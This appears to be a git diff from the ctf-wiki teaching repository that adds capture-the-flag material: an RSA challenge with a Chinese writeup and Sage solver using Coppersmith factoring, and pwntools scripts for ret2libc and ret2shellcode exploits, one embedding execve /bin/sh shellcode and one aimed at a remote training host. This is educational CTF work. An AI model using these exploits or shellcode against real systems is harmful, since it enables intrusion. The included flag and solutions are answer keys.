ctf-wiki
diff --git a/‎crypto/asymmetric/rsa/2017/xman-奇怪的RSA/attach/flag.enc
+1 b/‎crypto/asymmetric/rsa/2017/xman-奇怪的RSA/attach/flag.enc
+1
diff --git a/‎crypto/asymmetric/rsa/2017/xman-奇怪的RSA/attach/public.pem
+6 b/‎crypto/asymmetric/rsa/2017/xman-奇怪的RSA/attach/public.pem
+6
diff --git a/‎crypto/asymmetric/rsa/2017/xman-奇怪的RSA/attach/rsa.py
+50 b/‎crypto/asymmetric/rsa/2017/xman-奇怪的RSA/attach/rsa.py
+50
diff --git a/‎crypto/asymmetric/rsa/2017/xman-奇怪的RSA/writeup/exp.sage
+29 b/‎crypto/asymmetric/rsa/2017/xman-奇怪的RSA/writeup/exp.sage
+29
diff --git a/‎crypto/asymmetric/rsa/2017/xman-奇怪的RSA/writeup/flag.enc
+1 b/‎crypto/asymmetric/rsa/2017/xman-奇怪的RSA/writeup/flag.enc
+1
diff --git a/‎crypto/asymmetric/rsa/2017/xman-奇怪的RSA/writeup/flag.txt
+1 b/‎crypto/asymmetric/rsa/2017/xman-奇怪的RSA/writeup/flag.txt
+1
diff --git a/‎crypto/asymmetric/rsa/2017/xman-奇怪的RSA/writeup/public.pem
+6 b/‎crypto/asymmetric/rsa/2017/xman-奇怪的RSA/writeup/public.pem
+6
diff --git a/‎crypto/asymmetric/rsa/2017/xman-奇怪的RSA/writeup/readme.md
+131 b/‎crypto/asymmetric/rsa/2017/xman-奇怪的RSA/writeup/readme.md
+131
diff --git a/‎crypto/asymmetric/rsa/2017/xman-奇怪的RSA/writeup/writeup.py
+43 b/‎crypto/asymmetric/rsa/2017/xman-奇怪的RSA/writeup/writeup.py
+43
diff --git a/‎crypto/asymmetric/rsa/Extremely hard RSA/flag.enc
-512 Bytes b/‎crypto/asymmetric/rsa/Extremely hard RSA/flag.enc
-512 Bytes
diff --git a/‎crypto/asymmetric/rsa/Extremely hard RSA/pubkey.pem
-14 b/‎crypto/asymmetric/rsa/Extremely hard RSA/pubkey.pem
-14
diff --git a/‎crypto/asymmetric/rsa/hard RSA/flag.enc
-1 b/‎crypto/asymmetric/rsa/hard RSA/flag.enc
-1
diff --git a/‎crypto/asymmetric/rsa/hard RSA/pubkey.pem
-4 b/‎crypto/asymmetric/rsa/hard RSA/pubkey.pem
-4
diff --git a/‎crypto/classcial/monoalphabetic/TWCTF2016-super_express/encrypted
-1 b/‎crypto/classcial/monoalphabetic/TWCTF2016-super_express/encrypted
-1
diff --git a/‎crypto/classcial/monoalphabetic/TWCTF2016-super_express/problem.py
-17 b/‎crypto/classcial/monoalphabetic/TWCTF2016-super_express/problem.py
-17
diff --git a/‎pwn/stackoverflow/ret2libc/train.cs.nctu.edu.tw/ret2libc/exp.py
+22 b/‎pwn/stackoverflow/ret2libc/train.cs.nctu.edu.tw/ret2libc/exp.py
+22
diff --git a/‎pwn/stackoverflow/ret2libc/train.cs.nctu.edu.tw/ret2libc/libc.so.6
1.67 MB b/‎pwn/stackoverflow/ret2libc/train.cs.nctu.edu.tw/ret2libc/libc.so.6
1.67 MB
diff --git a/‎pwn/stackoverflow/ret2libc/train.cs.nctu.edu.tw/ret2libc/ret2libc
7.31 KB b/‎pwn/stackoverflow/ret2libc/train.cs.nctu.edu.tw/ret2libc/ret2libc
7.31 KB
diff --git a/‎pwn/stackoverflow/ret2libc/train.cs.nctu.edu.tw/ret2libc/ret2libc.idb
113 KB b/‎pwn/stackoverflow/ret2libc/train.cs.nctu.edu.tw/ret2libc/ret2libc.idb
113 KB
diff --git a/‎pwn/stackoverflow/ret2shellcode/sniperoj-pwn100-shellcode-x86-64/Makefile
+4 b/‎pwn/stackoverflow/ret2shellcode/sniperoj-pwn100-shellcode-x86-64/Makefile
+4
diff --git a/‎pwn/stackoverflow/ret2shellcode/sniperoj-pwn100-shellcode-x86-64/exp.py
+19 b/‎pwn/stackoverflow/ret2shellcode/sniperoj-pwn100-shellcode-x86-64/exp.py
+19
@@ -0,0 +1 @@
+177c83be810946f53b7c6ccb045e722a6d45b491e71ac1babfbff780d7d5bd177f02047e9e48573dc5a8ac9c046c9312df1dc8ed5d1f6f26b782cfe702cbdcd8436b836237b9232f7f51193fdb6111684f1e7960cccacf4ab67266a2e352b7f762610a08dbfefacc11c732750f2308ef1a4fc07c70a1b159f1cc77c6066ffc02431253afa0e5dc3e89882043cd1361a
@@ -0,0 +1,6 @@
+-----BEGIN PUBLIC KEY-----
+MIGuMA0GCSqGSIb3DQEBAQUAA4GcADCBmAKBkAGBdWVaTkcE7NEdi2G9ff4JLfVy
+nwbgbFZAwVsmJBsuRCD/uKefsPKF2gSwTw8/OSqv9ZwRZFrsvUfYT6/LloXRVqwn
+VDTlGr0oJ632In+0mRNW5gHmlzlrTAOWw9LXwSZNWXzpimARIqZjeyWcgnQ92DH4
+bmpQ4QFwU0bakA+vp0Nmy3A9K9rMjR/blC/yRQIDAQAB
+-----END PUBLIC KEY-----
@@ -0,0 +1,50 @@
+import gmpy2
+import random
+from Crypto.Util.number import getPrime
+from Crypto.PublicKey import RSA
+
+
+def get_part1(number):
+    res = 1
+    for i in range(2, number):
+        j = 2
+        flag = True
+        while j * j <= i:
+            if i % j == 0:
+                flag = False
+                break
+            j += 1
+        if flag:
+            res *= i
+    tmp = random.randint(1000, 9999)
+    return res + tmp
+
+
+def generate_public_key():
+    part1 = get_part1(100) << 512
+    part2 = random.randrange(1, 2**256)
+    p = part1 + part2
+    while not gmpy2.is_prime(p):
+        p = part1 + random.randrange(1, 2**256)
+    q = getPrime(512)
+    n = p * q
+    e = 0x10001
+    key = RSA.construct((long(n), long(e)))
+    key = key.exportKey()
+    with open('public.pem', 'w') as f:
+        f.write(key)
+
+
+def encrypt():
+    flag = open('./flag.txt').read().strip('\n')
+    flag = flag.encode('hex')
+    flag = int(flag, 16)
+    with open('./public.pem') as f:
+        key = RSA.importKey(f)
+        enc = gmpy2.powmod(flag, key.e, key.n)
+    with open('flag.enc', 'w') as f:
+        f.write(hex(enc)[2:])
+
+
+generate_public_key()
+encrypt()
@@ -0,0 +1,29 @@
+
+from sage.all import *
+
+n=359793065708835171342012982403389538721788606457645856715487227577194526064798303818572407032975833936178199713595331846778102841997912700946265231285246024230663051859876335242072374004279978008125992004515027281010928770488746000301666740722019469328342218484337725625411326416836525568083940937252398788555611188099231630860828419152057201221L
+
+e = 65537L
+
+part1 = 2305567963945518424753102147331756070
+
+def high_bits_known(pbar):
+    beta = 0.3
+    kbits = 256
+    PR.<x> = PolynomialRing(Zmod(n))
+    f = x + pbar
+    x0 = f.small_roots(X=2^kbits, beta=beta)
+    return x0
+
+for x in xrange(1000, 9999):
+    if x % 100 == 0:
+        print 'try ',x
+    tmp = part1+x
+    pbar = tmp*(2**512)
+    p = high_bits_known(pbar)
+    if len(p) > 0:
+        p = ZZ(p[0] + pbar)
+        if n % p == 0:
+            print "!!!Found!!!"
+            print "p: ",p
+            print "q: ",n/p
@@ -0,0 +1 @@
+177c83be810946f53b7c6ccb045e722a6d45b491e71ac1babfbff780d7d5bd177f02047e9e48573dc5a8ac9c046c9312df1dc8ed5d1f6f26b782cfe702cbdcd8436b836237b9232f7f51193fdb6111684f1e7960cccacf4ab67266a2e352b7f762610a08dbfefacc11c732750f2308ef1a4fc07c70a1b159f1cc77c6066ffc02431253afa0e5dc3e89882043cd1361a
@@ -0,0 +1 @@
+xman{Have_fun_with_RSA!}
@@ -0,0 +1,6 @@
+-----BEGIN PUBLIC KEY-----
+MIGuMA0GCSqGSIb3DQEBAQUAA4GcADCBmAKBkAGBdWVaTkcE7NEdi2G9ff4JLfVy
+nwbgbFZAwVsmJBsuRCD/uKefsPKF2gSwTw8/OSqv9ZwRZFrsvUfYT6/LloXRVqwn
+VDTlGr0oJ632In+0mRNW5gHmlzlrTAOWw9LXwSZNWXzpimARIqZjeyWcgnQ92DH4
+bmpQ4QFwU0bakA+vp0Nmy3A9K9rMjR/blC/yRQIDAQAB
+-----END PUBLIC KEY-----
@@ -0,0 +1,131 @@
+# 分析
+
+首先，简单分析一下程序，可以知道程序利用generate_public_key函数生成RSA公钥，利用encrypt函数加密flag，最后将flag以十六进制形式输入到flag.enc文件中。这里我们来仔细看下生成公钥的函数。
+
+```python
+def generate_public_key():
+    part1 = get_part1(100) << 512
+    part2 = random.randrange(1, 2**256)
+    p = part1 + part2
+    while not gmpy2.is_prime(p):
+        p = part1 + random.randrange(1, 2**256)
+    q = getPrime(512)
+    n = p * q
+    e = 0x10001
+    key = RSA.construct((long(n), long(e)))
+    key = key.exportKey()
+    with open('public.pem', 'w') as f:
+        f.write(key)
+```
+
+可以看出，p是由两部分组成的，其中一部分是由get_part1函数左移512位得到。
+
+```python
+def get_part1(number):
+    res = 1
+    for i in range(2, number):
+        j = 2
+        flag = True
+        while j * j <= i:
+            if i % j == 0:
+                flag = False
+                break
+            j += 1
+        if flag:
+            res *= i
+    tmp = random.randint(1000, 9999)
+    return res + tmp
+```
+
+而get_part1函数其实就是讲100以内的素数乘起来然后再加上(1000,9999)的一个随机值。如果我们假设100以内的素数的乘积为a，那么get_part1的结果就是a+random(1000,9999)。
+
+此后这个数会被移位，然后再加上了(1, 2**256)范围内的随机数。乍一看可能觉得不能做，，，但其实这道题是[Factoring with High Bits Known](https://ctf-wiki.github.io/ctf-wiki/#/crypto/asymmetric/rsa/rsa_coppersmith_attack?id=factoring-with-high-bits-known) 攻击，我们虽然说p的高位有一小部分是随机数，但是这部分随机数太小了，我们可以暴力枚举来得到结果。
+
+# 代码
+
+首先，我们先得到n和e，以及p的高位中100以内的素数的乘积
+
+```python
+import gmpy2
+import random
+from Crypto.Util.number import getPrime
+from Crypto.PublicKey import RSA
+
+
+def get_part1(number):
+    res = 1
+    for i in range(2, number):
+        j = 2
+        flag = True
+        while j * j <= i:
+            if i % j == 0:
+                flag = False
+                break
+            j += 1
+        if flag:
+            res *= i
+    print res
+
+
+def get_n_e():
+    with open('./public.pem') as f:
+        key = RSA.importKey(f)
+        print 'n: ', key.n
+        print 'e: ', key.e
+    return key.n, key.e
+```
+
+然后我们可以直接编写sage代码得到p和q。
+
+```python
+
+from sage.all import *
+
+n=359793065708835171342012982403389538721788606457645856715487227577194526064798303818572407032975833936178199713595331846778102841997912700946265231285246024230663051859876335242072374004279978008125992004515027281010928770488746000301666740722019469328342218484337725625411326416836525568083940937252398788555611188099231630860828419152057201221L
+
+e = 65537L
+
+part1 = 2305567963945518424753102147331756070
+
+def high_bits_known(pbar):
+    beta = 0.3
+    kbits = 256
+    PR.<x> = PolynomialRing(Zmod(n))
+    f = x + pbar
+    x0 = f.small_roots(X=2^kbits, beta=beta)
+    return x0
+
+for x in xrange(1000, 9999):
+    if x % 100 == 0:
+        print 'try ',x
+    tmp = part1+x
+    pbar = tmp*(2**512)
+    p = high_bits_known(pbar)
+    if len(p) > 0:
+        p = ZZ(p[0] + pbar)
+        if n % p == 0:
+            print "!!!Found!!!"
+            print "p: ",p
+            print "q: ",n/p
+```
+
+下面，我们就可以对密文进行解密得到结果了
+
+```python
+def get_enc():
+    with open('./flag.enc') as f:
+        return int(f.read(), 16)
+
+
+#get_part1(100)
+n, e = get_n_e()
+enc = get_enc()
+p = 30912612430010329735106068745932328064975005191230456661938177099292739592747102255580455176474604978442049097442980075369740910342136464209806039144344258921430018016151786358282584701369623
+q = 11639037836852113089565519736106317677116681989454609894239129622475886599564754669490030026817850279221814205531802378242845562976929460565098348616301827
+phin = (p - 1) * (q - 1)
+d = gmpy2.invert(e, phin)
+flag = gmpy2.powmod(enc, d, n)
+print hex(flag)[2:].decode('hex')
+```
+
+具体更加详细的代码可以参考writeup.py以及exp.sage。
@@ -0,0 +1,43 @@
+import gmpy2
+import random
+from Crypto.Util.number import getPrime
+from Crypto.PublicKey import RSA
+
+
+def get_part1(number):
+    res = 1
+    for i in range(2, number):
+        j = 2
+        flag = True
+        while j * j <= i:
+            if i % j == 0:
+                flag = False
+                break
+            j += 1
+        if flag:
+            res *= i
+    print res
+
+
+def get_n_e():
+    with open('./public.pem') as f:
+        key = RSA.importKey(f)
+        print 'n: ', key.n
+        print 'e: ', key.e
+    return key.n, key.e
+
+
+def get_enc():
+    with open('./flag.enc') as f:
+        return int(f.read(), 16)
+
+
+#get_part1(100)
+n, e = get_n_e()
+enc = get_enc()
+p = 30912612430010329735106068745932328064975005191230456661938177099292739592747102255580455176474604978442049097442980075369740910342136464209806039144344258921430018016151786358282584701369623
+q = 11639037836852113089565519736106317677116681989454609894239129622475886599564754669490030026817850279221814205531802378242845562976929460565098348616301827
+phin = (p - 1) * (q - 1)
+d = gmpy2.invert(e, phin)
+flag = gmpy2.powmod(enc, d, n)
+print hex(flag)[2:].decode('hex')
@@ -0,0 +1,22 @@
+from pwn import *
+from LibcSearcher import *
+ret2libc = ELF('./ret2libc')
+if args['REMOTE']:
+    sh = remote('140.113.209.24', 11002)
+    libc = ELF('./libc.so.6')
+else:
+    sh = process('./ret2libc')
+    libc = ELF('/lib/i386-linux-gnu/libc.so.6')
+system_offest = libc.symbols['system']
+puts_offest = libc.symbols['puts']
+sh.recvuntil('is ')
+sh_addr = int(sh.recvuntil('\n', drop=True), 16)
+print hex(sh_addr)
+sh.recvuntil('is ')
+puts_addr = int(sh.recvuntil('\n', drop=True), 16)
+print hex(puts_addr)
+system_addr = puts_addr - puts_offest + system_offest
+payload = flat([0x1c * 'a', 'bbbb', system_addr, 'bbbb', sh_addr])
+#gdb.attach(sh)
+sh.sendline(payload)
+sh.interactive()
@@ -0,0 +1,4 @@
+shellcode:shellcode.c
+	gcc -z execstack -fno-stack-protector -o shellcode shellcode.c
+clean:
+	rm ./shellcode
@@ -0,0 +1,19 @@
+from pwn import *
+from LibcSearcher import *
+code = ELF('./shellcode')
+if args['REMOTE']:
+    sh = remote(111, 111)
+else:
+    sh = process('./shellcode')
+
+# 23 bytes
+# https://www.exploit-db.com/exploits/36858/
+shellcode_x64 = "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
+sh.recvuntil('[')
+buf_addr = sh.recvuntil(']', drop=True)
+buf_addr = int(buf_addr, 16)
+payload = 'b' * 24 + p64(buf_addr + 32) + shellcode_x64
+print payload
+gdb.attach(sh)
+sh.sendline(payload)
+sh.interactive()
Original file line number	Diff line number	Diff line change
`@@ -0,0 +1 @@`
	`1`	`+177c83be810946f53b7c6ccb045e722a6d45b491e71ac1babfbff780d7d5bd177f02047e9e48573dc5a8ac9c046c9312df1dc8ed5d1f6f26b782cfe702cbdcd8436b836237b9232f7f51193fdb6111684f1e7960cccacf4ab67266a2e352b7f762610a08dbfefacc11c732750f2308ef1a4fc07c70a1b159f1cc77c6066ffc02431253afa0e5dc3e89882043cd1361a`